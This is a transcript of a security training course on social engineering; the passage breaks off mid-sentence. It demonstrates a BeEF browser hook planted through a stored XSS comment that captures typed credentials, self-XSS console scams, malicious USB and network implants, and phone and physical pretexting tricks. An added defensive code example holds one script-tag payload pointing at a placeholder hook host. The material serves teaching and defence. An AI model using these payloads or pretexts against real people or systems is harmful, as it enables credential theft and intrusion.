Play by Play Social Engineering


Course Overview

Hi. This is Troy Hunt and in this Play by Play course you're going to see my good mate, Lars
Klint and I, cover a heap of social engineering practices. You're probably already familiar
with what social engineering is, even if you perhaps don't know it by that term. So for
example, if you see advertisements, you inevitably see social engineering. If you have kids
like Lars and I, you probably see them attempt to socially engineer you many times over. We
may not know it by that term, but both of those are great examples of psychological
manipulation, which is what we're really talking about with social engineering. You're
probably also familiar with social engineering if you've ever received spam, particularly the
kind that tends to come from Nigerian princes with large amounts of money that they want to
exfiltrate with your help. They just need a few funds to get started. When it comes to social
information and information systems, humans are the weak link and social engineering
attempts to exploit our flaws. Flaws like greed and curiosity and even other attributes of our
personalities that we'd normally consider to be very positive. So things like sympathy and
courtesy; they're both behaviors that an adept social engineer is very good at exploiting. Even
the best protected systems can come undone when you put fallible humans into the mix, and
often we become the weakest link. In this Play by Play course, you're going to see Lars
and I take you through a number of different social engineering tricks which attackers have
become very good at using in order to compromise both people and systems. We had a lot of
fun creating this Play by Play course and we hope you enjoy watching it.

Computer-based Social Engineering


What Is Social Engineering?

Hi, I'm Troy Hunt and this is a play-by-play for social engineering and I'm here with my
previous play-by-play partner, Lars. Hi Lars. How are you, Troy? Good. I'm Lars Klint and
I'm also a Pluralsight author and I'm going to be Troy's test bit today, I think, I'm not quite
sure. You're my muse today. Yes, I think I'm going to be hacked. So, we're going to talk
about social engineering, I know that much, but what is social engineering? Yes, well, I'm
glad you asked, Lars. So when we talk about social engineering, you know, social
engineering is something that we all see every day. We're all exposed to this every day in
various ways. We both have kids. They are very good at social engineering and we'll
probably talk a bit more about that later. That's very true, yes. We all watch the news, we see
advertisements on the TV, we see things in the paper, online; advertising is very much social
engineering as well and really when you talk about social engineering and obviously we're
going to talk about it in a malicious context today as well, we're really talking about
psychological manipulation. Yes. So how can, I was going to say an adversary, but let's
imagine this is in a marketing context as well, but how can a target be engineered and
manipulated in such a way that they do something that they may not normally do? So, for
example, in advertising, how can we get you to buy that thing which you probably don't need,
but we're going to create a demand and fear and whatever else it is that drives you in order to
go out and spend money. Yes, which is the essence of marketing, I guess. Yes, it is the
essence of marketing and look, whether you're trying to sell something or whether you're
trying to steal someone's password, it's a similar sort of set of drivers and the interesting thing
about this is that social engineering is very much about exploiting a set of human
weaknesses. Yes, so there's sort of the same sort of standard human weaknesses over and
over again. Yes. So, for example, you're a nice guy. I'd like to think so. You're a
sympathetic guy and your sympathy is a human weakness insofar as an attacker might try to
say, hey, Lars, I'm in trouble; I need your help; I'm out of money, I'm stuck on the other side
of the world, and they would appeal to your sensitive, sympathetic nature. But surely they
would have to be someone that I know or have some relationship with. Well, this sort of now
gets to the point of what are the things the social engineer can do to try to be
effective? So we see enough social engineering attacks and particularly by spam. We're going
to look at spam quite a bit today as well, but we see a lot of stuff coming in by spam, which is
look, I am such and such a person, who you may not know and I'm sick and I just need a bit
of money to help me get better, so that's one thing. It's quite another that to your point if you
get a message from someone that you know and they say something like, I'm stuck on the
other side of the world and I got mugged and I don't have any money and I got to pay to get
out of the hotel, so that's probably more to your point. I have actually got that via Facebook, a
Facebook message from a friend, well, a Facebook friend, but still it was a relatively close
friend saying, I'm stuck and I need money, but it was an unusual characteristic for that person
so, you know, but it was certainly, you know, I guess that's what you're talking about--social
engineering. Yes, and that's interesting because when we look at the channels you get that
sort of message from, so when people's email accounts are compromised and their address
books are now available to the attacker or when their social media is compromised and they
can now reach out to those friends, and you sort of made the point there that behavior was
uncharacteristic so you're sort of exercising your antisocial engineering skills there in terms
of saying, and it may be you do this very implicitly as well, but you've sort of said, is this
behavior characteristic of the person that I know? Yes, was it and it was not, but you're
absolutely right; had it been someone else that, well, it could've worked. Right. I'm not
discrediting that at all. No, and I guess the point there is that you're adept enough to know
how this person normally behaves, but you know, that's sympathy, that's one aspect and one
of the other sort of social engineering scams that we regularly see run is people asking for
money and you can probably guess what sort of human weakness they exploit, right? Well,
that's one of the seven sins, you know, that's greed. Right, and I think we all get these emails.
If you have an email address, the chances of you getting something like what I call Nigerian
scams, you know, maybe they're not all from Nigeria, but where they say, I've got all this
money and you can have some if you help me. I think they're really common, but I don't
know, but is it just me? Yes, now a perfect example. We are all equally exposed,
unfortunately, to that sort of scam and really I'm going to talk about two different types of
social engineering today, so we're going to talk about computer-based social engineering
which is when you're getting things electronically. So you're getting things like mail, you
might be getting solicitation via Facebook such as you mentioned before, and we'll look at
spam in a moment on that, and then we're also going to talk about human-based social
engineering. So how can attackers in whether it be a face-to-face scenario or a voice-to-voice
scenario interact directly with you human to human and convince you to do things that you
might not otherwise do? Well, that's called marketing, isn't it? Yes, it is, that's funny; there's a
bit of a fine line there sometimes. I know, yes. But there are certainly cases where the intent
is very clearly to gain some upside over an adversary with malicious intent. Yes. So, either to
get you to perform an action you wouldn't normally perform and okay, the marketing action
would be to buy something. Yes. For the social engineer with a malicious intent, the intent
might be to get you to click on a link or to go to a website or to open an attachment, or the intent
may also be to get you to disclose something that you wouldn't normally do. Yes, that's what
I was getting at.

Computer-based Social Engineering - SPAM Email

So let's do this. Let's go and have a look at my junk mail because that is always a really good
place to start identifying very, very typical social engineering attacks. Yes, I'm getting you as
anyone else has hundreds of junk emails. I've got a lot of junk. I've got, as we can see here,
386 junk mail items in my folder here. They have come in over some period of time, but that
period of time is only a few weeks. So, I get a lot of these. There it is, another one just
coming right in right now. This is live, folks. This is real. So I get a lot of this sort of stuff
and you can see very easily just looking at the subject lines here. Look, there's probably just a
bit of junk in terms of trying to sell products and things like that, but as soon as I look at this
one at the bottom: Good day! I wish to know if we can work together. And you just know that
as soon as we look at something like that there is going to be an attempt to social engineer
me. Yes. Now you just mentioned the typical sort of Nigerian scam before, which is, you
know, Nigeria has become a bit of a colloquialism for the style of scam that asks for money
and in this case, they have a sum in USD Millions, I would like a slice of USD Millions. Oh, but
he doesn't say how many millions he has. He doesn't say how many millions, but often it's
excessive, isn't it? I know, that's what I mean, well, I don't know; to me as a normal human
being, if someone comes and says, oh, I'd like to give you $4 million out of the blue, I'd
go, oh no. You know if it's too good to be true, normally it is, so some of the scams to me are
just pointless, but they must work, like otherwise why would they do it? Well, work is a very
relative term. Or, have some effect. Well, here's the thing. So how many times is this message
sent, right? I don't know. I mean, it could be millions and millions and millions of emails that
get sent out because it's easy enough to send huge volumes as well and very often in this case
we're talking about adversaries who have access to things like botnet where they're sending
email from legitimate IP addresses, compromised machines. It's easy and cheap for them to
send out huge volumes. They only need a tiny, tiny, tiny hit rate in order to make their scam
successful and we're talking fractions of 1 percent. So, yes, you're smart enough and I'm
smart enough to see this and go, you know, it's a scam, I'm going to leave it, but hey, maybe
it's one in a million that says and they make a few grand out of it? As we have a look through
here and particularly if we go and let's do this, let's actually sort and instead of by date, let's
sort by size, because one of the things that tends to happen here, we've got our largest ones at
the top, is that very often these sorts of attacks want to try and attach malicious files and we
can see here, we've got one towards the top. "United Nations organization your payment
details." Now this is, you know, if you ask me, I don't think it's particularly well put together.
No, it just says, I need an attachment file, I mean they're not even trying, right? Now we're
not seeing the attachment here because it's in junk and Outlook has quarantined it, which is
good, but yes, you're right, they're kind of not even trying, but this is a great delivery
mechanism for malicious files and we've seen so many zero-day exploits in various pieces of
software where if you open this and your virus checker may not be aware of what that exploit
is, it's a zero-day and you exploit it, then you yes, you have all sorts of problems. It may be
that you end up with a key logger on your machine or it ends up as a slave in a botnet.
Opening emails like this can get you in a lot of trouble. Absolutely, and I have workplaces
where people were not tech savvy and for some reason these emails have come into the company
and they open one and there's been hundreds of infected machines within, you know, ten
minutes. Right, so and this is the thing because it propagates, too, right? Yes.

Computer-based Social Engineering - Phishing with BeEF

So that's problematic, but I thought we might go on and have a look at something a little bit
different in terms of a social engineering attack, a computer-based social engineering attack
and I've got a really good example and what I thought we might do is I might get you to open
one of my websites that I use in a lot of my courses, which is hackyourselffirst.troyhunt.
com. Hackyourselffirst.troyhunt.com. Alright. Alright, here we go. Oh, so it comes up,
Welcome to "Hack Yourself First." Okay, cool, so you've got that loaded up and this is just
one of my deliberately vulnerable websites. So let's just close that mode there and what this
site does is it lists a whole bunch of really nice cars that you can log in and vote on and this
has a little bit of a compromise page in it. So what I thought I might get you to do, go to the
leader board up there in the navigation bar, yes, and then after you get to the leader board, I'm
going to get you to go down and choose that very nice Ferrari. Let's spot the Ferrari La
Ferrari, yes. Which would be Ferrari La Ferrari. And if you click anywhere around that row,
that'll open that up. Yes. And that is that you are now in trouble, and I want to show you
exactly how. What?! Oh, no, hang on. It comes it as a surprise. This is going to be a really
good example of how we can mount a phishing attack on a web page. So you've just loaded
the site and that's fine, everything looks very normal. There is nothing here that shows any,
anything wrong. It's a legitimate site. So here's what we're going to do. I'm going to jump
over onto my PC now and I've got a URL in my clipboard, which is opening a site called
BeEF, or in fact it's an application called BeEF and BeEF is the browser exploitation
framework and BeEF is kind of cool because what it's actually done is it's hooked your
browser. It has? Now, you don't know this, but, in fact what we'll do is I will now and try and
steal some information from you or convince you that you should give me some information
and then I'll explain the hook. Alright. So in my control panel here I can see online browsers
and I can see an IP address here, which is the one that we're on here at the conference center.
I'm going to open that up and I'm going to jump on over to the commands tab. Now what I'm
going to be able to do is effectively send commands to your machine and get that web page to
behave in different ways. Yes, right. I'm going to jump down to social engineering here and
I'm going to jump down to petty theft and what I want to do is pop up a Facebook dialog, so
you can see that that's what it's defaulted to, you see? Yes. We could go through and choose
this little LinkedIn, YouTube, you know, all those, you know, normal sorts of things. Okay.
I'm going to go and execute that and that is sending the command to your machine. So your
machine is effectively my zombie now. Yes, and I still have no clue; there is nothing to
suggest. You've still got no clue. No. So, because your machine is my zombie, what it means
is I can effectively send commands to it and you'll see things appear. Is this only while I have
this browser window open? Yes, so once you close it, it's going to be unhooked and we'll
have a look at that hook implementation in a moment. Okay. Alright, so see what you've now
got on your screen. Yes, there's a Facebook login form. Facebook session has timed out, so,
and this is the thing. Like you think about victims here. They're normally used to logging into
Facebook, right? Yes, it's just a click. Well, you just do it without thinking almost. Well, it's
certainly, you know, sort of an automatic mental thing and so oh, I need into Facebook, I'll
just put my credentials in, but we also see Facebook as a social login in so many places as
well. Absolutely. And look, I mean, you might look at this as someone who has got a bit of a
clue of the risks that this involves and say, well, maybe it's not such a good thing, but what's
really powerful about this is that your browser has just been sitting there polling my BeEF
server and I've been able to sit here in the control panel, here in the command center and
issue the command. Now just go and fill out your legitimate Facebook credentials there for a
moment. Really? Should I do this? This is social engineering in action now, so do this. Fill
out an email address, fill out a password, let us perhaps not use the legitimate ones. So you
want me to put in the real password? Wouldn't that be a great social engineering demo if we
get Lars to do that? No, put in a fake password. Alright. Alright, and then when you're done,
you log on. I trust Troy Hunt right now. Is that a good thing? I don't know. No. Not wise.
Okay, cool. So as far as you know, you just authenticated Facebook and you now go back to
business, but on my screen here I've got my module results history and I've got command 1
and I'm going to go and have a look at what the result of command 1 was, and here I have
your data. So you just logged in as me at larsklint.com, password 123. Oh, that's the right
one. Well, it is certainly what you just entered and for many people it is the right one because
they see the social login and they just go for it. Yes. So this is a really good example of both
the phishing and how easy it is to hook someone and the risk that I used on this particular site
was that there was a persistent XSS risk. So I was able to go and leave a comment on the
Ferrari here and in fact, if you scroll down a little bit on the left side of the screen you'll see it
says Troy Hunt says 'nice.' Now as well as saying 'nice,' I put in a script tag and the script
tag embedded a hook from BeEF, which then allowed me to take control from my machine.
So is this a common thing? Is this something that I should be aware of as a user? Would you,
if you were, say, a malicious hacker with a hoodie on, would you actually have, is there
access to a lot of these comment fields, for example, where you can put in these scripts? So
what is a common theme is that attackers do want to get things like social logins in front of
victims and there are multiple different ways of doing it. Using something like BeEF, I mean
BeEF is a great way to sort of make a demonstration of how easy this is, but what attackers
would like to do is do things like if they can compromise an ad network, yes, and certainly
you see many cases that have in the past, is that they will embed script which will then call in
social logins and things like that and send the credentials off to their own machine. So
attackers are always trying to find ways to get this sort of information in front of victims, but
of course, this also raises the question and this is a really good question for any developers as
well. How do you protect your system if you assume that the user's password is
compromised? Because that's what I'm wondering. Is this, I mean, you can do now because,
you know, we're sitting here, next to each other and you're sort of explaining it, but is this a
common thing? Could you go onto any sort of major site with there's a comment section, say,
a news site for example, and would it be likely that they're not protected against this? Well,
we've got to remember, we saw two different risks here, so that the first risk was that that site
has a persistent XSS risk. Yes. So I was able to leave a comment that was JavaScript and not
only did it accept my JavaScript comment, but it then rendered that back to the source code of
the page, it didn't output in code, so that was sort of the initial victim and then of course there
was social engineering in terms of presenting you with a social login. But I want to get back
to this point about the expectation of your customers having had their accounts compromised,
usernames and passwords disclosed. Yes. So I know that you see this because you're a
security conscious guy, but if you were building a system, what is the mitigation for
compromised accounts? How do you make sure that your users can authenticate themselves
securely, even when the attacker knows their password? Well, you'd hope that your site has
two-factor authentication, for example. Right, so that brings us to 2FA. Now Facebook is a
really good example because on Facebook you have the ability of two-factor authentication, or
as we probably most strictly should call it, two-step verification, yes, because often you just
have the one vector, right? You have your phone, yes, and your phone has your email and it
has your authenticator app and all that sort of thing. Yes, but we have to sort of work on this
assumption where you need to assume the credentials are compromised, therefore you've got
to have a second step of verification. So even if someone fell victim to what happened just
then, and that was very clearly social engineering, yes, there's still that other layer of defense.
Yes, and this is, I mean when you say it, what comes to mind are the banks. Now if you log
into a bank, yes, you need to have your credentials, but if you want to do anything that has
any impact on your funds, you always have to put in a, get a text message into the code or
something like that. That's what I, you know, but if you're saying you can switch it on with
Facebook, but I don't, I might, I know a lot of people that wouldn't have done that. Yes, and
you raised another thing that's interesting too, which is that you can log into your bank, but if
you have to say, make a transaction above a certain value then you need to provide your code
and I really like the idea that you can actually have different layers of security and
verification depending on the actions being performed. So, look, I mean, perhaps going to
your bank and seeing your bank account details, we don't want an attacker to be able to do
that, no, but the impact of doing it is somewhat less than the impact of if they're actually able
to transfer funds. Right, that's right. So you might sort of present that second challenge at a
certain point. There are many people that would argue that should just have 2FA to log on in
the first place and that's a perfectly valid argument, but I like the recognition that we can
apply secure, or security in a more granular fashion as and where it's required. Yes,
absolutely. It's a fine balance between something that's annoying and something that's safe,
right? Because a lot of people are, oh, go and take my mobile again, and you know, it
becomes a hassle and you know how people want it now, now, now, so there's this fine line.

Social Media Phishing with Cross-site Scripting

Alright, so while we're talking about Facebook, I saw something interesting the other day
which is that one of the attacks that social engineers try to use, and let's just be clear as well,
social engineers, yes, we said our kids are social engineers, some social engineers, so you
know, they'll sort of appeal to our weaknesses and they'll ask mom and if mom says no, then
they'll go and ask dad and they'll go like mom says yes, and you know, we've all see this,
right? Yes, right. But the interesting thing is that kids themselves are good at malicious social
engineering and one of the things that we see kids do a lot of, and now we're talking about
more teenagers and kids that probably don't yet have a good sense of wrongs and rights in
terms of what they should and shouldn't be doing online, but we see things like cases where
they will try and get someone to copy and paste some script into the console of their
Facebook. So let me be clear at what I mean. I've got my Facebook open here and what they
would try and get you to do is, they'd write up instructions for the victim. Now we're keeping
in mind that the victim has no idea what they're actually doing here. They would say
something like, find out which of your friends has been looking at your profile; all you've got
to do is copy and paste the script. Oh, I was wondering how they actually got people to do it.
Right, so they have to incentivize because remember, they've got to appeal to a human
weakness and the weakness they're usually appealing to here is curiosity. But also the thing if
it's teenagers is the fear of missing out. Yes, there's that too. So you could say, oh if you don't
do this, then you won't get to go to the party or whatever. All your other friends are doing it,
right? Yes, exactly. So what they would do is something like they'd give instructions and say
press F12 and really what we're talking about here is effectively people XSS-ing themselves.
They are mounting a cross-site scripting attack against themselves, which sounds really
bizarre and it only works when they can be coerced into running script in their browser. So
they have no idea that it's malicious because they have the end goal in mind to do it? Correct,
and frankly if you or I just eyeballed a big piece of JavaScript, it's very hard to tell without
sitting down and really thinking about it. Especially if it's obfuscated or whatever. Well,
exactly, they could obfuscate it as well and here's a question I often ask my workshops
particularly around cross-site scripting, what can you do if you can run arbitrary JavaScript on
someone else's website? Almost anything. That's the answer. You can do just about anything.
There are security controls around what JavaScript can and can't do. So for example,
JavaScript cannot access any cookies that are flagged as HttpOnly. Yes. Okay, good example.
The other thing is, is that if you use something like a content security policy, which
whitelists the sources which external content can be loaded from, JavaScript can't be used to load
in other things from other domains that are untrusted. Alright. So there are some limitations
to what you can do with JavaScript, but you can certainly do a lot and in cases like this, you
could easily change the path of particular links or you could change words on pages or things
like that. You said kids, right? And we're talking JavaScript, which is not the easiest language
in the world, so is this a common thing or are we now talking about things that are probably
going to happen as kids get more and more educated? No, this happens now. It does. And
look, you're right. It's not a simple thing to write a sophisticated JavaScript attack, but by the
same token, kids don't have to go to work, you know? Like they don't have to cook dinner.
They'll stay up all night, they'll hack away at this stuff; they can be very clever and to be
clear, it's not always just kids in the legal sense. It could be that they are kind of younger than
us, therefore, you know, they're kids. Get off my lawn! It's that sort of thing.
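The two sections above describe the same chain from both ends: a comment field that renders a script tag into the page (which is how the BeEF hook got onto the car voting site) and the controls that limit what such a script can do (output encoding, HttpOnly cookies, a Content Security Policy). The Node.js code below is an added illustration written for this page, not code from the course or from hackyourselffirst.troyhunt.com; the comment text, the hook host name and the session id are constructed placeholders.

```javascript
// Added example: persistent XSS in a comment field, vulnerable vs hardened
// rendering, plus response headers that blunt an injected script.
// Runs under Node.js with no dependencies.

// Constructed comment of the kind described in the course: visible text plus
// a script tag that would load a hook script. The host is a placeholder.
const constructedComment =
  'nice <script src="http://hook-host.example/placeholder-hook.js"></script>';

// Vulnerable rendering: the comment is concatenated straight into the HTML,
// so every visitor's browser parses and executes the script element.
function renderCommentVulnerable(author, body) {
  return `<li><b>${author}</b> says ${body}</li>`;
}

// Output encoding: the five HTML-significant characters become entities, so
// the comment is displayed as text rather than parsed as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: encode every untrusted value at the point of output.
function renderCommentHardened(author, body) {
  return `<li><b>${escapeHtml(author)}</b> says ${escapeHtml(body)}</li>`;
}

// Quick check used by the demo: does a rendered fragment still contain a live
// script element? (A real review would use an HTML parser, not a regex.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the case where a comment does slip through:
//  - a CSP that only allows scripts from the page's own origin, so the
//    remote hook script is refused by the browser;
//  - a session cookie marked HttpOnly, so script cannot read it.
function hardenedHeaders(sessionId) {
  return {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "Set-Cookie": `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Evaluate a header set: true only when script-src is restricted to 'self'
// and the session cookie carries the HttpOnly flag.
function headersBlockHook(headers) {
  const csp = headers["Content-Security-Policy"] || "";
  const scriptSrc = (csp.match(/script-src\s+([^;]+)/) || [])[1] || "";
  const cspOk = scriptSrc.trim() === "'self'";
  const cookieOk = /;\s*HttpOnly\b/i.test(headers["Set-Cookie"] || "");
  return cspOk && cookieOk;
}

// Demo: the same comment rendered both ways, then the hardened headers.
console.log("vulnerable:", renderCommentVulnerable("Troy Hunt", constructedComment));
console.log("hardened:  ", renderCommentHardened("Troy Hunt", constructedComment));
console.log("headers:   ", hardenedHeaders("constructed-session-id"));
```

The vulnerable output contains a real script element; the hardened output shows the tag as literal text, and the header check confirms that even an injected script could not load from the hook host or read the session cookie.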

Human-based Social Engineering


Common Examples of Human-based Social Engineering

Look, I think that's probably a good place to end around computer-based social engineering
and we should start to have a bit of a think about human-based social engineering. Okay. So I
mean, let me ask you the question. Can you think of cases where you have seen attempts to
human-based social engineer you? Yes, I get phone calls and the phone calls are often from
local companies, so in Australia there would be phone companies, there'd be power
companies, they'd be banks, but the people that ring always have an accent that's not
Australian. Which sounds like modern-day customer support. Yes, but the weird thing is that
they ring me to have something and it's always something like your internet will be switched
off if you don't do something or we need to verify your details, otherwise your account will
be closed. So there's, that's exploiting another human weakness, right? Yes. So it's you are
fearful that if you don't respond then you're going to lose something and I've seen the same
sort of thing that you're talking about where someone says, we are from your telephone
company or from your internet company and something is at risk or you're going to lose
something unless you follow our steps now. Yes, and it always is and often what I do,
because as we know, we work in this industry, I say, oh let me just call you back, because if
it's a legitimate thing then, yes, so it's often not very convincing, but. And do they give you a
number to call them back on? They don't, no, they often hang up. So here's something that's
curious because there are multiple issues that come up here. So you know, this is certainly
something that happens a lot and let's just define this human-based social engineering thing
for a moment. This is a human talking to you; this is not them sitting at the end of a terminal
with the luxury of time to sit there and digest your message and figure out how to respond.
No. These guys have got to be much better in terms of how they're actually going to engineer
you because you're going to ask questions and they've got to have responses ready. So
they're, already there's this sort of, they're leveling up a little bit. Now on the flip side, the
victim is somewhat more at risk because they're almost sort of on the back foot, right? Like,
I've just been called out of nowhere, I mean, like there's a virus on my computer or my
network is about to get switched off, my telephone is yanked and my cable company will go,
and they're having to be on the defensive and very often that puts them in a position of
weakness where they're having to respond without the luxury of time to think about it.
Absolutely, and I think what they may be targeting as well is people that are in a situation
where that could be possible right now. Like I know my internet is not going to be switched
off, but there may be a situation where someone, that could happen, so they're exploiting,
maybe they're probing, they're searching for weakness that may know exists in, for some
people. Yes, that's true and you know, let's sort of talk about the counter measure while we're
there because I half-jokingly said, do they give you a number to call them back on, and I
guess the joke here is that for the social engineer who is engaged in human-based social
engineering and they're really thinking about what they're doing, if the customer said, could I
have a number to call you back and verify you on, the social engineer would like to give you
a number that goes back to the social engineer. This is really not verification. Now I had a
really good case with someone who was saying that they were from my bank. In fact, I had
this several times because what would happen is it would be a long-distance call, a long delay
before I answered, then it was _____, like calls, a foreign accent, and 'this is your bank--we
would like to talk to you about your account, we just need to verify your details first--can you
tell us date of birth,' so on and so forth. And I was saying to them, well this is fantastic--
thank you very much for calling me; I would like to verify you first, and these guys are going,
but we're your bank, and so I'm like I need you to prove to me that you are my bank--can you
give me some information about my account first? Well, no we can't, we need you to verify
yourself first, and I ended up saying to them, well look, I'll tell you what; I will go to your
website and I will get the phone number off your website and I will call you back, and they
said, no-no-no; that doesn't go to the right location--let us give you the phone number. But
the thing is, yes, go on. But let me finish this because I had to say to them, but you do not
realize the problem with that? You could give me any number. And as it turned out, it was
my bank. It was legitimately my bank and they exhibited all of the social engineering signs
and they even called back a couple of other times and eventually I had to call customer
service locally in Australia and say, look I think this is a scam and they very embarrassingly
said, no, it's not, and true story, they actually took a little bit of money off the interest of my
home loan, too, after I reported it. Hah! Because I had the exact same thing happen, I was
about to say that, that's actually how they operate. Well, I did ask, I pushed. So that makes it
really hard to, as a consumer, to know when you, you know, when is it a scam or not? Like,
they're not making it any easier for us, right? Well, now you're quite right in that they don't.
Now this was one bank. I have another credit card provider who called me up and said, your
credit card has been defrauded and we would like to verify your identity and I was sort of
going, oh, man, here we go again. Okay, I need to verify you first. But this time they said,
okay, here's how you do it. Take the card out of your wallet, turn it over, and call us on the
phone number on the back. Yes, right. And that's also right because that is an independent
channel of verification. That's not them telling me how to do the verification. No, it's on the
thing. So it's already on there. I mean, they're telling me but they're giving me a way of doing
it independently. So unless they've actually faked the card, no never mind.

Social Engineering Devices

Alright, so let's talk about something else in terms of in-person social engineering and in fact,
in a way this isn't in person because you're not face to face with the attacker, but one of the
attack vectors, which is often popularized in discussing social engineering is USB sticks. Yes.
And one of the sort of canonical examples of social engineering via USB sticks is you'll have
an attacker walk through a car park, but with a handful of stuff like this. Now believe it or
not, this is actually legitimately what I pulled out of my travel bag. I had no idea why I have
all of these. I did see it. But they will go and they'll place them around the car park in certain
ways and the weakness that they're trying to exploit in the human here is? Well, someone is
going to find it and they're going to, oh, I wonder what's on it? What's on that? Curiosity.
Curiosity, exactly. So the human, the vulnerable human, will pick up the USB stick and go,
ah! I would've picked the gold one as well. So what's on here? Pick the best one, whack it in,
and let's face it; it will be a little bit more subtle. It might be a large car park and they'll lay a
few around and someone will go back and plug it into their machine and inevitably a lot of malicious
software gets distributed via USB. In fact, I've got another good example that demonstrates it
just perfectly right here. Now this looks like a bottle opener USB stick. Yes. You can have a
look. It's real. Yes, which is what you get at any conference, almost. Right. There's nothing
unusual about this. Well, it's funny you should mention this. So I got this at a conference and
they were very popular because it is actually a bottle opener, you know? It's heavy; it has
weight to it, yes. It's got some heft to it. Now I was talking at this conference and just before I
went on stage, the distributors of this, and you will see that there's a recognizable Linux
distribution logo on it. There is indeed, yes. You might say which one. The distributors of this
had to come on stage and say, look, we're really sorry; every single one of these has got
malware on it and everyone that's plugging them into their machines is getting infected and
they didn't realize, because this is a Linux distro, it had a Windows-based piece of malware
on it, and I carried this around complete with malware, the entire time. You're welcome to
plug it in if you like. Is it safe? Don't plug it in. But that's what it was, just as a nice little
reminder of just how badly this sort of stuff is distributed. So there was an accidental distribution
of it, really. Yes, so this was accidental; they certainly didn't intend to infect people and it
was very embarrassing for them as well. Yes, well I thought it might have been a conference
gimmick, you know? So there was nothing malicious other than you got infected with
something that was essentially benign. Yes, but no, you're saying it was actually not. No, it
wasn't intentional and it was malicious and it's not the first time, as well. There have been
other conferences, in fact there was another security conference in Australia some years ago
where one of the vendors there is handing out free USBs and guess what? There's bad things
on it. Yes, right. So unfortunately, that does actually happen. Now we can take that even
further as well when we're looking at USBs and I've got another little bag of tricks here. Oh
yeah? And in fact, I did show this on another play-by-play so I'm only going to talk about it
very briefly, but this is, as you can see here? That's a Rubber Ducky. It's a USB Rubber Ducky
and what you can do. It sounds very, very safe. It sounds quite innocuous. What you can do
with the USB Rubber Ducky is you can use one of these and you can take a look at that. This
looks like exactly one I have from another company, except it's black instead of red. Right,
and if you saw that, you'd go okay, well that is just a thumb drive, right? Absolutely. But
what it actually is, is a keyboard. What? Believe it or not, it is a keyboard. So what you can do
is you can actually take this thing apart and inside it has a little chip and the little chip can be
programmed. This is mad! This is James Bond. And there's like a little micro SD card in there
and then that is what you program such that when you plug that in; I know, it's cool, isn't it?
It's awesome. So this has got a little caddy that you program and you place it in and then
you put it in the USB slot and that then becomes the attack vector. So you could set this up to
run particular commands on the host operating system, open software, connect to external
services; there's a whole lot you can do with this. You can program it to target either PCs or
Macs or whatever, you know, device you think that your victims are going to plug into. So
this is a really good example of social engineering because people generally don't think about
the risks associated with the USB stick, and they like receiving them. No, not at all. This was
the problem with these guys, right? Yes. The silver ones here. Yes, and they're shiny.
Everyone liked getting these and the first thing they want to do is whack it into their PC. Yes,
and I'm just thinking that this sort of relates back to the email, doesn't it, because you have
something that is left by someone else, right? It's like a link. You know, you don't know what
the link is, don't click on it; you don't know what's on the USB. Curiosity again. Yes. Alright,
so let's put all this aside. Yes, I'll put it over here. That's USBs and we'll put that over here.
Now, another good example. So while we're talking about sort of physical hardware-based
hacking in a social engineering context as well, another good one from the same company,
this little device called a, a LAN Turtle. LAN Turtle. So we've got duckies and turtles. Duckies
and turtles. Now here is what the LAN Turtle does. So when you pull this guy out, and I'm
going to take it out of its packaging, and see what this looks like. Look at the other end. That
looks like something I have in my bag, which is a LAN to USB. Yes, so basically it's an
Ethernet adaptor that you can plug into a machine, like your Surface Pro, which doesn't have a
hard wire in it. Yes, that's why I have one in my bag. Right, and the case. Now you know,
this is a really good example of where a social engineer might want to leave this attached to a
machine so they can have remote control over it, because what this actually does is it gives
them control of the device and it's USB as well, so they can send commands to the machine
and it's also a man-in-the-middle device because your connection is going through here and
you can control the traffic. But you've still got to plug it in. You've still got to plug it in. Now
this will bring us to this sort of in-person on-premises kind of social engineering. Okay. We'll
talk about that in a moment, too. Okay, yes. We'll talk about how you could possibly get this
into an organization, but of course, one of the things that might happen if you're in an
organization and someone has placed this on your machine is you might become a little bit
suspicious of it. Well, yes. So I'll let you hold that and I'll show you how we might fix it. So what I
would do as a social engineer is I would put a big note on it, like this, and I'd
probably put a great big rubber band on it and then I'd attach that, so it tells everyone, it says,
IT--do not remove! Alright, now IT has said that you need to leave it in your machine and
then you wrap that together with a big rubber band around it and stick in the machine, and
someone would go, well, it does say IT, you know? It looks odd, but it's from IT, we'd better
not remove it. Yes, and we all know that IT people do odd things, like, we're not meant to
understand. Well, look there is that, granted, IT people do odd things, but the other thing is
that IT in many organizations, when it comes to the way machines are managed is a bit of an
authority, okay, insofar as they do these wonderful magic things; people trust them to get all
this stuff right, and just as IT might plug that into a machine and ask for it not to be removed,
IT might also call someone up and say they're having some problems with their machine.
Yes. Look, we're going to try and help you out; I've noticed you have some dramas, we're just
going to need to get your password first. Okay. Now something like that, of course, is a pretty
sort of unsophisticated approach, you know? Just give me your password, but what a social
engineer will try and do is give the person a bit more information to give them confidence
that the social engineer is indeed legitimate. Yes. So they might say, for example, look we
can see that you're there in the marketing department on a certain level in a certain office.
We've got particular problems with that area, you know? Now what we'd like to do is try and
get your password to help you sort it out. And we're going to talk in a moment about open
source intelligence and how attackers get that sort of information, but they want to create that
air of authenticity. Yes, absolutely. Now another trick that I read about just the other day
which was quite interesting and this one was from Kevin Mitnick who was a great big hacker
back in the 1990s. He was very infamous, ended up going to jail, gone good, and written
many interesting things, and one of the things he said is what he would do when calling
someone up in that sort of capacity, in order to socially engineer them. Let's say he called
someone up at an organization. He'd call them up and just after he started talking to them he'd
say, hang on, I need to put you on hold, we've got another call, and he would play an
advertisement from the company that he was calling. Now he's pretending to be from that
company, right, but what he's doing is he's saying, you know, I'm calling from Acme Corp. I
just got another call, let me put you on hold, and then play an Acme Corp ad. So it feels
legitimate. It feels legitimate and it's not that the person on the other end of the phone goes,
oh, I've heard the ad, that's it, it's all okay, but it is that little subliminal psychological thing
where they go, ah!. There's just a little bit more authenticity. Yes, well, that's very clever. So
that one is a good one. The other one that I have shown many, many times in many of my
talks and this is the sort of the latest evolution of it is the Pineapple, the Wi-Fi Pineapple. Yes.
And this is the Nano, this is actually a USB one. You can just plug it straight into a USB and
effectively this becomes a malicious wireless hotspot. So a thing of evil. It is a thing of evil
and it is enormously effective at being evil and by using this I can stand up a wireless hotspot
